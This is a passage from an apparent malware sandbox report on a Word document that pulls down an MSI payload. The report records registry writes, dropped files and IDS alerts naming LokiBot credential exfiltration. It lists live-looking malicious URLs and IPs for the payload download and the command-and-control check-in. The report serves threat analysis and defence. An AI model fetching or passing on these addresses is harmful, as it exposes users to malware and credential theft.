Value:
1298661508
(PID) Process:(1264) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661509
(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
F0040000927E0BC12F77D40100000000
(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:;a!
Value:
3B612100F004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:;a!
Value:
3B612100F004000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
Executable files
3
Suspicious files
2
Text files
12
Unknown types
8

Dropped files

PID
Process
Filename
Type
1264WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR36AB.tmp.cvr
MD5:
SHA256:
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF80A74F7450274096.TMP
MD5:
SHA256:
2932msiexec.exeC:\Config.Msi\184e2d.rbs
MD5:
SHA256:
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF2E78471749F551A9.TMP
MD5:
SHA256:
1588MSI4F66.tmpC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
1264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
1264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml.LNKlnk
MD5:
SHA256:
1264WINWORD.EXEC:\Users\admin\Desktop\~$1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xmlpgc
MD5:
SHA256:
2932msiexec.exeC:\Windows\Installer\MSI4C46.tmpexecutable
MD5:
SHA256:
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
2
Threats
22

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
2932
msiexec.exe
GET
200
23.229.196.4:80
http://socaleights.com//images/2014/jzfdyijsh.msi
US
executable
964 Kb
malicious
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1588
MSI4F66.tmp
209.182.209.40:80
parkerhdd.com
InMotion Hosting, Inc.
US
malicious
2932
msiexec.exe
23.229.196.4:80
socaleights.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
socaleights.com
  • 23.229.196.4
malicious
parkerhdd.com
  • 209.182.209.40
malicious

Threats

PID
Process
Class
Message
2932
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2932
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2932
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1588
MSI4F66.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
4 ETPRO signatures available at the full report
No debug info